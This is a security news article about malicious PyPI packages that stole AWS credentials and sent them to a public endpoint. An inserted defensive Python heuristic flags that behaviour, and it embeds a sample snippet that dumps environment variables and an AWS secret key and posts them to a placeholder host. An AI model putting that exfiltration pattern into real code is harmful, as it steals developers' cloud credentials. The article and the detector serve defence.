Researchers have discovered several malicious packages in the official PyPI repository


Information security specialists from Sonatype have discovered several malicious packages in the official PyPI repository. The packages were designed to steal AWS credentials and environment variables and to send the stolen information to an openly accessible endpoint.

The list of detected malicious packages looks like this:

  • loglib-modules – aimed at developers using the loglib library;

  • pyg-modules – aimed at developers using the pyg library;

  • pygrata – target unknown;

  • pygrata-utils – the target is unknown, but the package contains malicious code from ‘loglib-modules’;

  • hkg-sol-utils – target unknown.

Analysis of the ‘loglib-modules’ and ‘pygrata-utils’ packages revealed the presence of malicious code to steal AWS credentials and metadata and upload them to one or more endpoints hosted on the PyGrata domain. The stolen data was publicly available in the form of hundreds of TXT files.
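A defender-side heuristic for the behaviour described above, added here as an example and not Sonatype's own tooling: it parses a Python module's AST and flags the combination of AWS credential or metadata access with an outbound HTTP call. The indicator lists and the sample module are constructed for this example; the endpoint URL is a placeholder.

```python
"""Heuristic audit of Python source for the pattern the article describes:
reading AWS credentials (environment variables, ~/.aws/credentials, the EC2
metadata service) combined with an outbound HTTP call. The heuristic, indicator
lists and sample are constructed for this example, not Sonatype's own tooling."""
import ast

# Indicators of AWS credential or metadata access.
AWS_ENV_VARS = {"AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN"}
AWS_PATH_FRAGMENTS = (".aws/credentials", "169.254.169.254")
# Root module names of common outbound HTTP libraries.
HTTP_MODULES = {"urllib", "requests", "http", "httpx"}


def _root_name(node):
    """Return the leftmost name of an attribute chain, e.g. 'urllib' for urllib.request.urlopen."""
    while isinstance(node, ast.Attribute):
        node = node.value
    return node.id if isinstance(node, ast.Name) else None


def audit_source(source: str) -> dict:
    """Report which indicators appear; 'suspicious' is True only when credential
    access and an outbound HTTP call occur in the same module."""
    tree = ast.parse(source)
    strings = [n.value for n in ast.walk(tree)
               if isinstance(n, ast.Constant) and isinstance(n.value, str)]
    reads_env = any(s in AWS_ENV_VARS for s in strings)
    reads_path = any(frag in s for s in strings for frag in AWS_PATH_FRAGMENTS)
    # Wholesale environment dumps (os.environ) also capture AWS_* variables.
    dumps_env = any(isinstance(n, ast.Attribute) and n.attr == "environ"
                    and _root_name(n) == "os" for n in ast.walk(tree))
    calls_out = any(isinstance(n, ast.Call) and _root_name(n.func) in HTTP_MODULES
                    for n in ast.walk(tree))
    return {
        "aws_env_vars": reads_env,
        "aws_paths": reads_path,
        "environ_dump": dumps_env,
        "outbound_http": calls_out,
        "suspicious": (reads_env or reads_path or dumps_env) and calls_out,
    }


# Constructed sample mimicking the reported behaviour; the URL is a placeholder.
SAMPLE = """
import os, json, urllib.request
data = {"env": dict(os.environ), "key": os.environ.get("AWS_SECRET_ACCESS_KEY")}
urllib.request.urlopen("http://endpoint.example/collect", json.dumps(data).encode())
"""

if __name__ == "__main__":
    print(audit_source(SAMPLE))
```

Run it over each module of a freshly installed dependency (for example every `.py` under `site-packages/<package>/`) before the package is used; a module that reads credentials but never calls out is reported but not marked suspicious.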

“Our researchers noticed that the endpoints collecting credentials made them accessible to almost everyone,” the Sonatype report says.

Experts have yet to determine the attacker's identity and motivation.

After the researchers reported their findings, all of the malicious PyPI packages and the collection endpoint were taken down.

Earlier, a backdoor was reported in other PyPI packages. There, a simple typo in the code could lead to data leakage and the compromise of thousands of users' devices.
